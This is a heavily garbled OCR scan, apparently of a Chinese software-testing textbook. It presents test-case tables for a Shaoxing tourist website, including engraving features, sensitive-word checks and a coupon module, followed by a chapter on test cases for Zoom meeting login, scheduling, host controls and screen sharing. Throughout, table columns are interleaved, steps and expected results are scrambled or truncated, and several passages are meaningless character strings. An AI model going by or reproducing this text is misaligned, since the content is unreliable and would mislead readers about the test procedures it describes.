nu 按钮 位 置 不 展示 攻略 ,底部 显示 “登录 能 
O "ab" ERG 获得 更 多 功能 "和 “返回 ”按钮 
(D 单 击 “ 返 回 "按钮 (3) 跳 转 到 登录 页 面 
(4) 返回 电子 刻字 首页 
CD 进入 电子 刻字 首页 ,页面 展示 "体验 
(D 用 户 在 到 此 一 游 首页 单 击 | — 电子 刻字 "按钮 和 电子 刻字 样 例 
“电子 刻字 ”链接 (2) 页 面 跳 转 到 电子 刻字 页 面 ,页 面 展 
(D 用 户 单 击 “ 体 验 电子 刻字 ”| — 示 正 常 .美观 ,可 选择 不 同 的 字体 、 
按钮 调整 字体 大 小 变换 字体 颜色 .调整 
(3) 单 击 “ 浏 览 "按钮 ,选择 DOC| 文字 位 置 、 选 择 系统 图 上 
格式 的 文件 , 单 击 “确定 "|(3) 页 面 提示 只 能 选择 GIF, JPG, 
. 1. 按钮 JPEG、PNG 等 格式 的 文件 
nth (4) 选择 不 同 格式 的 图 片 , 单 击 | (4) 图 片上 传 成 功 , 且 预 览 图 片 变 为 上 
“确定 "按钮 nm 
(5) 单 击 生成 图 片 并 保存 至 我 的 | (5) 页 面 提示 图 片 保存 成 功 , 且 按 钮 下 
空间 方 展示 生成 界面 
O 单 击 进 入 我 的 空间 查看 (© 进入 我 的 空间 页 面 ,页 面 展示 保存 
CD 单 击 我 的 空间 页 面 上 的 “ 返 | — 的 图 片 列表 ,展示 “返回 电子 刻字 ” 
回电 子 刻字 "按钮 按钮 , 且 新 保存 的 图 片 排 在 首位 
(7) 页 面 跳 转 到 电子 刻字 页 面 
CD 进入 手写 刻字 首页 ,页 面 展示 “体验 
未 登录 用 户 在 导 | M EUM 手写 刻字 ”按钮 和 手写 刻字 样 例 
Reha eu o amiotar gaa D EATSATI RI 
刻字 ” 图 片 ,供用 户 选择 ,底部 显示 “登录 





按钮 





能 获得 更 多 功能 ” 
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续 表 
实际 测试 
测试 用 例 标题 操作 步骤 期 望 结果 de 
CD 进入 手写 刻字 首页 ,页 面 展示 “体验 
inf a TT 手写 刻字 ”按钮 和 手写 刻字 样 例 
o mnag-hayuag- OD 进入 和 手写 刻字 首页 , 轮 播 系统 景区 
图 片 ,供用 户 选择 ,提供 3 种 字体 颜 
(3) 单 击 选择 文件 ,选择 DOC 格 i S O ar E 
已 登录 用 户 在 导 | — 式 的 文件 , 单 击 "确定 ”按钮 SPEC PNG2F A IUE b 
航 条 中 单 击 * 手 写 | (4) 选择 不 同 格式 的 图 片 , 单 击 | UE 
刻字 ” “确定 "按钮 ale 
L Le NUT C5) 页 面 提示 图 片 保存 成 功 
comsmARWemag | © 进入 我 的 空间 页 面 ,页 面 展示 保存 
。_| 的 图 片 列表 ,展示 “返回 手写 刻字 
CD 单 击 我 的 空间 页 面 上 的 “ 返 
Miri 按钮 , 且 新 保存 的 图 片 排 在 首位 
(7) 返回 到 手写 刻字 首页 
在 导航 条 中 单 击 | 用 户 在 到 此 一 游 首页 单 击 “书法 asa 
in a 进入 书法 墨宝 主页 ,展示 各 字画 成 虽 
(1) 输入 电子 刻字 内 容 中 包含 敏 | a a 
敏感 词汇 测试 m ; : 





(2) 手写 刻字 内 容 包 含 敏感 词汇 





D 页 面 提示 : 内 容 包含 敏感 词汇 ,请 
重 写 ,保存 失败 ,当前 页 提示 








DO 专家 点 评 


到 此 一 游 电子 刻字 系统 是 智慧 绍兴 最 大 的 亮点 ,其 中 游客 自己 设计 刻字 应 该 是 最 受 欢 
迎 的 一 项 ,但 也 应 该 更 注意 ,涉及 敏感 词 的 内 容 是 不 可 以 提交 的 。 
测试 人 员 在 设计 测试 用 例 时 ,除了 界面 、 功 能 .性 能 等 方面 要 考虑 ,也 要 与 国情 相 结合 ， 
像 刻字 、 评 论 等 允许 用 户 自主 输入 文字 ,或 者 用 户 自主 上 传 文件 ,除了 考虑 安全 性 ,还 要 考虑 
政治 问题 ,需要 建立 敏感 词 库 , 这 是 很 少 有 人 会 考虑 到 的 地 方 。 
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* 
获取 购 
景 
景 
景 





景区 特产 优惠 购 模 块 测试 用 例 设 计 


区 特产 优惠 购 模块 提供 景区 内 商家 、 特 色 商 品 信息 的 展示 ,以 及 旅客 通过 扫描 二 维 码 
买 商品 的 优惠 券 等 功能 。 

区 特产 优惠 购 系统 展示 如 图 6-11 所 示 。 
区 特产 优惠 购 系统 思维 导 图 如 图 6-12 所 示 。 
区 特产 优惠 购 系统 测试 用 例 , 如 表 6-5 所 示 。 


162, Ski cae SEHR S 
N 


ER 


€ > C [O wwwroqksoncomvzhsuiato/ 








a 
景区 特产 优惠 购 


ae sarean 





B 





HANUS 


EWoNR ET 


THES SSIHEE E, RAMANA. GRO». 

BON maqa ESSISOSR. MAYEN, ARNESES ias , irt ESE FERAE , FOBT, IN 
R MAME, RB. TIPE , BEAR. BROREN, HRNIREoxOóH. NUSH—SATEGESDNA Hwa Na. Gun 
TGGEOJéM OP, EABSECRIFESO 16^ BEC E—, RERE 28 TONNAR DA. 

BATS. HISEPRIBBD;ANGNOnERIE TUN. MSECGUGPBIDIRR, E RIMSMTGRMM, OE HORR. 
mamapa , VETACEANETZ DEZA, 

ARAME , REUMAN , mayat , FERREUS, MRNA. BIS, TIERA TNE , MESARA. R 
8 AMBREN gv, AE, WURST ASK E UB ED, ATR, CUGERUICARTRUAOUN, ReSNONE , aT 
ITUSMAKUUN USO MUNIMOUORUNOE EOUSTOS quoc. OUTWUESUEX UR, MT STIS saan. 
何不 可 全， CPRD tikanman MEERDERE, MURE. ETDIURZ. masa. ITGBORNR 
ARNES, RIECIIOMRIID rb , TIENE, Cnsuwanpau BAB, Ctt TRIN R2. 


Beta Bn en OmIRE, EFELER , COUTE , mokeseitsun , COBBAN , SIR Re 
LUST. Samy ew xND LIGENAION RUNS Vem. IURCGOSR TISMHEROUR . TURBINENE. 


图 6-11 景区 特产 优惠 购 系统 展示 

















单 击 进入 景区 特产 优惠 购 主页 ) 





在 导航 条 中 单 击 “ 扫 一 扫 ” 









在 导航 条 中 单 击 “电子 优惠 券 ” 上 CD 
在 导航 条 中 单 击 “ 商 家 * 





景区 特产 优惠 购 





在 导航 条 中 单 击 “ 商 品 展示 








在 导航 条 中 单 击 “特产 小 故事 " 











图 6-12 景区 特产 优惠 购 系统 思维 导 图 
表 6-5 ”景区 特产 优惠 购 系统 测试 用 例 


实际 测试 
测试 用 例 标题 操作 步骤 期 望 结果 (Pass/Fail) 





(1) 展示 最 近 发 表 的 一 篇 帖子 内 容 
COD. 用 户 用 浏览 器 访问 智慧 绍兴 首 | (2) 展示 参与 扫 一 扫 活 动 商家 的 活 
页 http://www. roqisoft com/ 动 信息 ,包括 正在 进行 的 活动 
zhsx, 在 首页 单 击 “景区 特产 优 和 即将 开始 的 活动 
惠 购 " 链 接 (3) 展示 有 优惠 券 的 商品 信息 
景区 特产 优惠 购 OD 在 导航 条 中 单 击 “ 扫 一 扫 ” (4) 进入 商家 信息 展示 页 面 ,展示 
(3) 在 导航 条 中 单 击 “ 电 子 优惠 券 ” 有 代表 性 的 几 家 商家 信息 
(D 在 导航 条 中 单 击 “ 商 家 ” (5) 进入 商品 展示 页 面 ,展示 特色 
O 在 导航 条 中 单 击 “ 商 品 展示 ” 商品 详细 信息 
(6) 在 导航 条 中 单 击 “特产 小 故事 ”| (6) 进入 特产 小 故事 介绍 页 面 , 详 
细 介 绍 各 特产 故事 
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M 专家 点 评 


景区 特产 优惠 购 系统 主要 是 帖子 的 形式 ,所 以 进入 景区 特产 优惠 购 主 页 是 最 新 发 表 的 
一 篇 帖子 , 单 击 下 一 篇 帖子 会 发 现 ,链接 中 的 post 参数 值 更 小 。 


sm 


对 城市 空间 网 站 http://www. oricity. com 进行 测试 用 例 设计 。 
提醒 : 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 测试 用 例 设计 。 
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读书 笔记 
44 e$: 44; e@; «4: e@; «4: e@: ^4; e$: ed: e$: ^4; e: 


读书 笔记 Name: Date: 








励志 名 名 : Whatever the outcome , we must resolutely proceed with our objective. 





无 论 结果 如 何 , 我 们 必须 坚定 地 继续 为 目标 而 努力 。 





















































设计 在 线 会 议 类 测试 用 例 | 


^ &EHÜ ) 


在 线 会 议 系 统 主要 包括 注册 登录 、 预 约会 议 、 主 持 人 启动 会 议 、 受 
邀 用 户 加 入 会 议 、 常 用 会 议 功能 设置 与 使 用 、 共 享 屏 幕 、 结 束 会 议 等 功 
能 。 在 线 会 议 的 核心 功能 包括 语音 与 视频 交流 ,共享 桌面 或 其 他 应 用 
程序 ,主持 人 能 管理 会 议 室 成 员 、 能 邀请 人 加 会 ; 普通 用 户 能 通过 邀 
请 信 、 收 到 的 加 会 链接 ,或 通过 拨打 电话 参加 在 线 会 议 。 

通过 本 实验 的 学 习 , 软 件 测试 工程 师 能 自己 设计 相对 完备 的 在 线 
会 议 类 测试 用 例 , 方 便 自己 或 他 人 执行 这 些 测试 用 例 ,通过 经 典 测试 
用 例 的 设计 展示 ,让 每 位 读者 体会 设计 思路 。 


7.1 RZN Zoom 项 目 总 述 


在 线 会 议 又 称 网 络 会 议 或 远程 协同 办 公 , 用 户 利用 互联 网 实现 不 
同 地 点 多 个 用 户 的 数据 共享 ,不仅 省 去 了 会 议 室 供不应求 的 麻烦 ,还 
方便 了 异地 工作 同事 之 间 的 沟通 交流 ,在线 会 议 的 质量 要 求 当 然 就 越 
来 越 高 。 

Zoom 云 会 议 是 一 款 比较 好 的 在 线 会 议 工具 。Zoom 云 会 议 将 移 
动 协作 系统 、 多 方 云 视频 交互 系统 、 在 线 会 议 系 统 三 者 无 颖 整合 ,为 用 
户 打造 出 便捷 易 用 的 一 站 式 音 视频 交互 .数据 共享 技术 服务 平台 , 提 
供 完全 BYOD 式 的 统一 通信 技术 解决 方案 。Zoom 官网 地 址 为 
WWW, zoom. us, 

Zoom 采用 自 有 核心 专利 技术 ,动态 调整 视频 通信 质量 。 画 面 高 
清流 畅 ,不 卡 顿 ,即使 丢 包 率 达 到 20% ,依然 畅通 无 阻 。 无 论 是 Office 
文档 .PDF、 应 用 程序 ,还 是 音 视频 文件 , 均 能 清晰 共享 给 所 有 与 会 者 ， 
同时 支持 与 会 者 编辑 和 批注 。 账 号 密码 采用 不 对 称 加 密 进行 存储 , 音 
视频 通信 和 数据 共享 均 使 用 128 位 加 密 通 道 , 更 安全 。 会 议 服务 器 不 
记录 ,不 向 其 他 目标 位 置 转发 任何 会 议 信息 。 
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7.2 在 线 会 议 系 统 测 试用 例 设 计 思 路 


在 线 会 议 虽然 不 是 特别 大 的 项 目 ,但 因为 主持 人 和 参 会 者 的 权限 不 同 ,逻辑 稍微 有 点 
绕 , 对 于 一 些 流程 比较 复杂 或 者 工作 量 比 较 大 的 






































需求 ,测试 人 员 必 须 理 清 思路 ,首先 确定 核心 功 ED 

能 ,从 核心 功能 云 发 散 思考 ,最 好 能 在 一 开始 设 | 

计 一 个 思维 导 图 ,把 测试 场景 整理 一 下 ,再 次 结 = 

合 需求 阅读 时 ,可 读 性 更 强 , 思 路 更 清晰 ,修改 也 p tae en) 

更 方便 。 Zoom 云 会 议 加 入 会 议 
对 于 Zoom 云 会 议 测试 方案 的 设计 ,主要 从 

在 线 会 议 的 功能 出 发 ,客户 端的 安装 、 印 载 ,手机 站 (会议 能 aD 

与 PC 端 分 开 测 试 等 ,本 测试 方案 都 未 涉及 。 读 o 共享 屏幕 

者 也 可 以 自行 设计 来 熟悉 本 工具 的 使 用 。 > 
对 于 所 有 的 测试 项 目 ,最 基本 的 方法 是 分 模 e awan | 





块 细 测 ,再 组 合 起 来 测试 。Zoom z e DUB AE SE 
图 如 图 7-1 所 示 。 


7.3 登录 Zoom 云 会 议 模块 测试 用 例 设计 


发 起 在 线 会 议 人 ,需要 先 下 载 Zoom 云 会 议 客户 端 , 然 后 注册 一 个 账号 供 使 用 。Zoom 
云 会 议 的 注册 在 官网 进行 ,不 属于 在 线 会 议 测 试 方案 范畴 ,因此 本 测试 方案 从 登录 开始 。 登 
录 后 Zoom 云 会 议 界面 展示 如 图 7-2 Bras o 


图 7-1 Zoom 云 会 议 思维 导 图 









ECCE oc 


个 人 会 WD 


Il 184-7105-5097 
egrntent tune 


























图 7-2. 登录 后 Zoom 云 会 议 界面 展示 
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登录 Zoom 云 会 议 的 设计 ,主要 集中 在 会 议和 人 口 及 会 议 中 所 使 用 的 基本 设置 。 其 主要 
功能 的 思维 导 图 如 图 7-3 所 示 。 





切换 账号 
注销 


退出 


设置 -4 高 级 设置 








登录 Zoom 云 会 议 








我 的 会 议 











图 7-3 登录 Zoom 云 会 议 思 维 导 图 
登录 Zoom 云 会 议 测试 用 例 ,如 表 7-1 所 示 。 
表 7-1 登录 Zoom 云 会 议 测试 用 例 





实际 测试 
测试 用 例 标题 E fE b WE 期 望 结 果 loea 
(D 弹出 “更 换 账号 "“ 注 销 ” 和 * 退 
(D 单 击 主页 左上 角 的 用 户 名 旁边 | MRA 
ds Zom 云 会 | TRMA (2) 跳 转 到 登录 窗口 , 记 住 的 密码 
o Pen (2) 单 击 “更 换 账 号 "按钮 还 在 ,可 更 换 账号 重新 登录 
(3) 单 击 “ 注 销 "按钮 (3) 跳 转 到 登录 窗口 , 记 住 的 密码 
CD 单 击 “ 退 出 ”按钮 清空 ,重新 输入 可 登录 


(4) 关闭 Zoom 云 视 频 客户 端 


(1) 跳 转 到 设置 窗口 ,展示 设置 
内 容 

(2) Zoom 系统 可 以 依据 用 户 本 人 

CD 单 击 主页 右上 角 的 “设置 "按钮 的 喜好 ,做 许多 个 人 设置 。 例 

(2) 选择 或 取消 各 选项 如 ,设置 录制 路 径 , 录 制 完成 

G) 单 击 “ 高 级 设置 "按钮 后 ,视频 自动 保存 到 该 路 径 下 

(3) 可 设置 更 多 会 议 相关 内 容 。 例 
如 ,注意 力 跟踪 、 远 程 支持 、 文 
件 传输 等 





W 


“登录 Zoom X 
议 ” 一 “设置 ” 
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续 表 
测试 用 例 标题 操作 步骤 期 望 结果 aine 
(Pass/Fail) 
D 单 击 主页 的 “视频 会 议 ” > 
(2) 单 击 主页 的 “音频 会 议 ” Tn ss 
“登录 Zoom Z & CD 单 击 主页 的 “加 入 会 议 ” (3) 输入 会 议 ID 和 名 字 加 入 会 议 
W> ER” i (4) 安排 会 议 


(4) 单 击 主页 的 “安排 ” 


D 
episc m O 输入 会 议 号 和 共享 代码 共享 


屏幕 
(D 展示 “我 的 会 议 ” 内 容 , 及 “录像 
文件 ”链接 
(2) 展示 个 人 会 议 ID, 可 勾 选 “总 在 
本 机 上 使 用 个 人 会 议 ID 开会 ” 
(3) 展示 会 议 开始 时 间 ( 今 天 、 明 天 
T 
^ T 会 议 “链接 | 。 或 后 天 ), 展 示 会 议 主题 和 会 议 
m 时 间 , 会 议 未 开始 时 可 单 击 “ 开 
LL LO. 安排 的 会 议 开 始 时 间 没 到 
RX GA BÉ LLL NES 会 “编辑 "和 “删除 ”按钮 ,会 议 
议 ”>“ 会 议 ” s 中 不 可 单 击 “ 开 会 ”按钮 ,可 单 
(5) 安排 的 会 议 结束 时 间 已 过 “su ge 
(6) 单 击 * 会 议 " 上 方 的 * 录 像 文件 "| E 删除 "和 -编辑 按钮 
(4) 展示 会 议 进行 中 ,展示 主题 和 


es 会 议 时 间 ,不 可 单 击 “ 开 会 ”“ 编 
辑 " 和 “删除 ”按钮 

(5) 不 展示 在 我 的 会 议 列表 

(6) 有 录像 文件 展示 录像 文件 列表 ， 
可 播放 ,打开 和 删除 声音 
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设计 测试 用 例 必须 清楚 需求 的 范围 和 用 例 的 验证 点 ,如 果 作 为 项 目前 内 部 的 测试 ,用 例 
还 需要 更 加 详细 ,比如 设置 模块 ,可 以 具体 到 每 项 设置 都 可 以 作为 一 个 验证 点 ,这 里 相当 于 
给 一 个 模板 ,最 重要 的 是 设计 思路 。 一 般 第 一 次 设置 测试 用 例 , 总 会 有 遗漏 点 ,如 表 7-1 写 
成 测试 用 例 模式 ,再 次 检查 时 就 不 容易 看 出 问题 。 如 果 在 设计 测试 用 例 前 能 设计 一 个 思维 
导 图 ,模块 .场景 和 验证 点 都 一 目 了 然 ,更 容易 看 出 遗漏 问题 ,修改 也 更 方便 。 

细心 的 朋友 会 发 现 , 表 7-1 的 测试 用 例 是 一 个 操作 步骤 对 应 一 个 验证 点 ,这 样 更 清楚 每 
一 步 操作 得 到 什么 样 的 结果 ,与 设计 初 思路 是 否 一 致 。 当 然 , 这 只 是 个 人 习惯 ,如 果 读 者 有 
更 好 的 、 适 合 自 己 的 方法 ,也 可 尝试 .调整 .完善 ,以 便 写 出 更 高 质量 的 测试 用 例 。 


7.4 ”召开 /预约 /加 入 会 议 模块 测试 用 例 设计 


召开 会 议 也 就 是 发 起 会 议 。 在 Zoom 云 会 议 主页 可 发 起 视频 会 议和 音频 会 议 ,同时 
Zoom 云 会 议 还 具有 预约 会 议 的 功能 。 提 前 预约 会 议 .填写 好 会 议 信息 ,到 了 预订 时 间 就 可 
以 开始 会 议 。 加 入 会 议 非常 简单 ,可 以 打开 别人 分 享 的 链接 加 入 会 议 , 也 可 以 通过 自己 的 会 
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议 ID 主动 加 入 。 以 上 功能 的 思维 导 图 如 图 7-4 所 示 。 

































在 主页 单 击 “视频 会 议 ” 
H 召开 会 议 
在 主页 单 击 “ 音 频 会 议 ” 
: 预约 会 议 © 在 主页 单 击 “ 安 排 会 议 " 
d 加 入 会 议 e 在 主页 单 击 “ 加 入 会 议 ” 
图 7-4 召开、 预约 和 加 入 会 议 思维 导 图 
召开 、 预 约 和 加 入 会 议 测试 用 例 , 如 表 7-2 所 示 。 
表 7-2 召开 .预约 和 加 入 会 议 测 试用 例 
实际 测试 
结 
测试 用 例 标 题 操作 步骤 期 望 结果 (Pass/Fail) 





(1) 进入 视频 会 议 , 摄 像 头 和 语音 
自动 开启 ,用 户 可 自行 开启 或 





召开 会 议 (1) 在 主页 单 击 “ 视 频 会 议 ” 关闭 摄像 头 和 语音 
(2) 在 主页 单 击 “ 音 频 会 议 ” (2) 进入 音频 会 议 ,只 开启 语音 ,不 
开启 摄像 头 ,用 户 可 自行 开启 
或 关闭 摄像 头 和 语音 
选择 会 议 开始 时 间 ,持续 时 间 、 视 频 


会 议 “ 会 议 ” 
预约 会 议 在 主页 单 击 “ 安 排 会 议 选项 和 会 议 选项 
(1) 输入 姓名 ,成 功 加 入 会 议 

(1) 单 击 别 人 的 会 议 邀 请 链接 (2) 弹出 对 话 框 提示 输入 会 议 ID 





mAex (2) 在 主页 单 击 “ 加 入 会 议 ” 和 姓名 
(3) 输入 会 议 ID 和 姓名 (3) 成 功 加 入 会 议 
(4) 打开 已 结束 的 会 议 链接 (4) 提示 无 效 的 会 议 ID, 页 面 展示 会 
议 卫 输 入 框 和 “加 入 会 议 "按钮 














x 专家 点 评 


召开 、 预 约 和 加 入 会 议 与 会 议 的 启动 有 关 。 召 开会 议 由 主持 人 启动 ,可 启动 视频 会 议 ， 
也 可 启动 音频 会 议 , 还 可 预约 会 议 。 如 果 知 道 一 个 会 议 的 ID, 可 以 通过 输入 ID 加 入 会 议 ; 
最 简单 的 加 会 方式 是 通过 他 人 分 享 的 加 会 链接 , 单 击 该 链接 便 可 以 直接 加 入 会 议 。 更 详细 
的 有 音频 和 视频 的 具体 设置 ,还 有 测试 话 简 、 视 频 清晰 等 验证 点 。 


7.5 会 议 功能 模块 测试 用 例 设 计 


会 议 功能 是 在 线 会 议 最 重要 的 功能 。Zoom 云 会 议 的 会 议 功能 以 参 会 者 的 身份 划分 模 
块 , 参 会 者 的 身份 只 有 两 种 ,分 别 为 主持 人 和 会 议 参 与 者 ,但 会 议 中 免不了 主持 人 和 会 议 参 
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与 者 有 互动 ,所 以 需要 划分 3 个 模块 。 主 持 人 参 会 界面 如 图 7-5 所 示 。 


邀请 网 址 : 





电脑 古音 已 连接 











言 若 金 叶 Zoom 会 议 
言 若 全 叶 
https;//www.zoomus.cn/j/1378321646 












图 7-5 主持 人 参 会 界面 


会 议 参与 者 参 会 界面 如 图 7-6 所 示 。 


ARBAN 











O Zoom SSD: 131-323-9194 7 iw 
会 议 主题 : 言 若 金 叶 Zoom 会 议 
主持 人 : 言 若 全 叶 
邀请 网 址 : https//www.zoomus.cn/j/1313239194 
sm 
参与 者 ID : 17 














会 议 功能 思维 导 图 如 图 7-7 所 示 。 
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共享 屏幕 


语音 控制 


视频 控制 


邀请 别人 


aem 





语音 控制 CD 


视频 控制 





八 _ 断 开 音 频 CD 
N 离开 D 
参 会 者 举 手 提示 ,可 让 成 员 把 手 放下 
聊天 与 某 位 成 员 聊 天 
与 所 有 人 聊天 























主持 人 与 参 会 者 互动 可 请 求 某 位 成 员 开启 摄像 头 
参 会 者 录制 视频 
主持 人 对 某 参 会 者 开启 语音 或 静音 
图 7-7 会 议 功能 思维 导 图 
会 议 功 能 测试 用 例 ,如 表 7-3 所 示 。 
表 7-3 会 议 功 能 测试 用 例 
测试 用 例 标题 操作 步骤 期 望 结果 a 
(Pass/Fail) 
(D 对 音频 进行 基本 设置 和 测试 ， 
可 开启 和 关闭 自己 的 语音 
DI n (2) 对 视频 进行 基本 设置 ,可 以 开 
会 议 功能 一 主持 人 | "2) TANAR matca | 。 启 和 关闭 自己 的 视频 
的 基本 设置 功能 “| CO EAE E MS a |G) 复制 链接 或 DRL, 或 者 发 邮件 
n SHEET 邀请 他 人 
XGA 按 但 (4) 复制 链接 或 URL, 或 者 发 邮件 
PIN 
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续 表 
n 实际 测试 
测试 用 例 标题 操作 步骤 期 望 结果 Parre 
CD 主持 人 可 让 某 位 参 会 者 或 全 体 
D 主持 人 管理 参 会 者 语音 ARME uu ata 
(2) 主持 人 设置 其 中 一 位 参 会 者 为 和 放下 作 和 saj, 
会 议 功能 一 主持 人 | 主持 人 (2) 权限 交接 ,会 议 由 新 的 主持 人 
(3) 主 n ， 
(4) 主持 人 移 除 某 位 参 会 者 
CD 参 会 者 被 迫 离 开会 议 
CD 视频 开始 录制 
(2) 暂停 录制 视频 ,不 自动 转换 
格式 
CD 会 议 中 主持 人 单 击 "录制 "按钮 |(3) 停止 录制 视频 ,提示 会 议 结束 
会 议 功能 一 主持 人 |(2) 单 击 “暂停 " 按 乌 时 转换 为 MP4 格式 
录制 视频 (3) 单 击 * 停 止 "按钮 (4) 会 议 结束 ,视频 自动 转换 为 
(4) 主持 人 结束 会 议 MP4 格式 ,在 Zoom 的 客户 端 
“会 议 " 中 的 “录像 文件 ", 有 转 
换 成 功 的 MP4 文件 ,文件 所 在 
目录 为 设置 里 面 的 目录 
CD 弹出 二 次 确认 提示 ; 如 果 不 想 
CD 主持 人 在 页 面 上 单 击 “结束 会 | 。 中 断 会 议 ,请 在 离开 前 指定 一 
"E DERA JUR ARANA 
(2) 单 击 “取消 ” 开会 议 " 和 “取消 "按钮 
会 议 功能 一 主持 人 |(3) 单 击 “离开 会 议 ” (2) 回 到 会 议 中 
结束 会 议 CD 未 指定 主持 人 , 单 击 “ 结 束 会 | (3) 主持 人 自己 离开 ,会 议 继续 , 系 
PE 统 自动 指定 主持 人 
(5) 指定 主持 人 后 , 单 击 “ 结 束 会 | (4) 会 议 结束 
议 ” (5) 主持 人 自己 离开 ,会 议 继续 ,由 
指定 的 主持 人 继续 主持 会 议 
CD 参 会 者 基本 功能 设置 与 主持 人 
相同 ,都 可 开启 和 关闭 自己 的 
语音 和 视频 , 也 可 游 请 别人 
- i 54 
会 议 功能 一 参 会 者 0， ZI (2) 参 会 者 只 能 查看 有 什么 人 参 
基本 功能 使 用 会 , 谁 是 主持 人 ,只 可 为 自己 改 





(3) 参 会 者 单 击 “ 离 开会 议 ” 





名 ,只 能 为 自己 静音 或 解除 
静音 

(3) 参 会 者 自己 离开 会 议 ,会 议 
继续 
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续 表 
实际 测试 
(Pass/Fail) 





测试 用 例 标题 操作 步骤 期 望 结 果 





(OD 主持 人 看 到 参 会 者 的 举 手 请 
求 ,选择 放下 手 ,可 以 打开 举 手 
者 语音 让 其 发 言 

(2) 打开 聊天 窗口 ,可 最 小 化 、 展 
示 、 关 闭 、 独 立 弹出 、 合 并 到 会 
议 主 窗口 ,也 可 选择 与 所 有 人 
聊天 ,或 选择 与 某 个 人 私 聊 


(D 参 会 者 单 击 “ 举 手 ” (3) 该 参 会 者 桌面 弹出 提示 “主持 

(2) 参 会 者 或 主持 人 单 击 “ 聊 天 ” 人 请 您 开启 摄像 头 ”, 选 择 “ 开 
会 议 功能 一 主持 人 |(3) 主持 人 单 击 其 中 一 个 参 会 者 启 ” 立 即 开启 摄像 头 ,选择 “ 稍 
与 参 会 者 互动 “请 求 开 启 视 频 ” 后 ”不 开启 摄像 头 

(4) 参 会 者 单 击 “ 录 制 ” (4) 弹出 提示 “请 向 会 议 主持 人 申 

(5) 主持 人 对 参 会 者 语音 的 控制 请 录制 许可 ”, 单 击 “ 确 认 ” 按 


钮 ,主持 人 确认 请 求 后 , 参 会 者 
可 开始 录制 视频 ,主持 人 拒绝 
后 , 参 会 者 不 能 录制 视频 

(5) 主持 人 打开 某 参 会 者 语音 ,该 
参 会 者 发 言 大 家 都 能 听见 , 主 
持 人 将 某 参 会 者 语音 静音 ,该 
参 会 者 发 言 大 家 听 不 见 


x wasiq I 


会 议 功能 最 重要 的 就 是 会 议 中 使 用 的 功能 ,会 议 中 主持 人 和 套 会 者 因为 身份 不 同 , 从 而 
权限 不 同 , 因 此 功能 模块 首先 以 参 会 者 身份 划分 。 但 既然 是 开会 ,肯定 少不了 互动 ,尤其 是 
在 线 会 议 ,大 家 不 在 同一 个 地 方 ,需要 讨论 或 者 发 言 时 ,需要 有 所 动作 ,因此 ,在 设计 分 模块 
时 ,把 两 者 的 互动 单独 作为 一 个 模块 。 


7.6 共享 屏幕 模块 测试 用 例 设计 


从 7.5 节 可 以 看 到 ,会 议 功能 中 还 有 一 个 最 重要 的 功能 没有 描述 , 那 就 是 共享 屏幕 。 
为 共享 屏幕 是 会 议 中 最 主要 的 功能 ,也 是 在 线 会 议 功能 最 大 的 特色 之 一 ,因此 该 功能 需要 单 
独 介 绍 。 

共享 屏幕 前 主持 人 可 对 共享 屏幕 进行 设置 ,同时 ,共享 屏幕 最 大 的 特点 是 : 在 屏幕 共享 
时 ,不 影响 共享 者 对 会 议 其 他 功能 的 使 用 。 针 对 此 要 求 ,将 共享 屏幕 功能 进行 模块 划分 为 共 
享 设置 ( 仅 主持 人 )、 屏 幕 共享 的 功能 及 屏幕 共享 时 可 使 用 的 会 议 其 他 功能 。 
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共享 屏幕 时 的 界面 如 图 7-8 所 示 。 


p 








Cs m 上 NL. 
"M Jea 


Era ET 








图 7-8 屏幕 共享 时 的 界面 


共享 功能 的 思维 导 图 如 图 7-9 所 示 。 








同时 多 人 共享 








同时 单 人 共享 
仅 主 持 人 可 以 共享 
所 有 人 参与 才 可 以 共享 





仅 主持 人 可 以 在 别人 共享 的 同时 开始 
所 有 人 参与 才 可 以 在 别人 共享 的 同时 开始 共享 





暂停 : 暂停 或 播放 屏幕 共享 
共享 一 个 新 的 窗口 : 切换 共享 的 窗口 
注释 : 在 共享 的 内 容 中 进行 注释 










屏幕 共享 的 功能 





qp 
禁止 参 会 者 标注 (主持 人 ) : 关闭 或 开启 参 会 者 注释 功能 
停止 共享 : 关闭 屏幕 共享 ， 不 关闭 会 议 





静音 : 关闭 或 开启 麦克 风 
启动 视频 : 开启 或 关闭 摄像 头 视频 内 容 
管理 参 会 者 (主持 人 )/ 参 会 者 ; 开启 参 会 者 相关 控制 功能 











WX: 与 参 会 者 文字 聊天 
屏幕 共享 时 能 使 用 的 会 议 功能 “人 BHüH. 北 请 更 多 参 会 者 进入 会 议 


录制 : 对 会 议 内 容 进行 录制 











音频 设置 : 设置 语音 功能 
视频 设置 : 设置 视频 功能 
会 议 结束 : 关闭 会 











图 7-9 共享 功能 的 思维 导 图 


屏幕 共享 功能 的 测试 用 例 ,如 表 7-4 所 示 。 
a ”屏幕 共享 功能 的 测试 用 例 


实验 7 设计 在 线 会 议 类 测试 用 例 x 

















z 实际 测试 
测试 用 例 标题 操作 步 又 期 望 结果 (saa 
. . CD 展示 同时 多 人 共享 或 同时 单 人 
设置 DaF“ "3 SLE , 可观 
c» 主持 人 音 击 "高级 共享" 这 项 S ATE 
CD 主持 人 设置 同时 单 人 共享, 参 |(1) 只 允许 一 人 共享 屏幕 ,提示 B 
会 者 A 共享 屏幕 未 关闭 时 , 参 | SAKA 正在 共享, 单 击 确认 
会 者 了 发 起 共享 关闭 A 的 屏幕 共享 ,展示 B 的 
(D 主持 人 设置 同时 多 人 共享, 参 | 。 屏幕 共享 
共享 设置 一 设置 多 | 。 会 者 单 显 示 器 查看 AGBS CO. 只 能 看 见 其 中 一 个 人 的 共享 ， 
少 参 会 者 可 同时 | dex 但 两 个 人 的 屏幕 共享 都 在 进 
共享 CD 主持 人 设置 同时 多 人 共享 , 参 | 行 中 
会 者 双 显示 器 查看 A 和 B 的 | (3) 能 同时 看 见 A M BERERE 
共享 C 谁 可 以 共享 和 谁 可 以 在 别人 共 
(4) 主持 人 设置 同时 多 人 共享 , 查 | 。 享 的 同时 "开始 共享 "选项 置 灰 
看 “高 级 共享 设置 "页 KT 
CD 主持 人 设置 仅 主持 人 可 以 共 | Cl) 谁 可 以 在 别人 共享 的 同时 “ 开 
享 ,查看 “高 级 共享 设置 "页 ; 
à 始 共享 "选项 置 灰 不 可 选 
D 主持 人 设置 仅 主持 人 可 以 共 |(。 提示 主持 人 锁定 了 观众 屏幕 共 
享 , 参 会 者 单 击 "共享" 按 乌 enis 
共享 设置 ~ 设置 谁 |(3) EARED SKUI] C 
2x summa xx saza © 提示 主持 人 在 共享 , 单 击 确认 
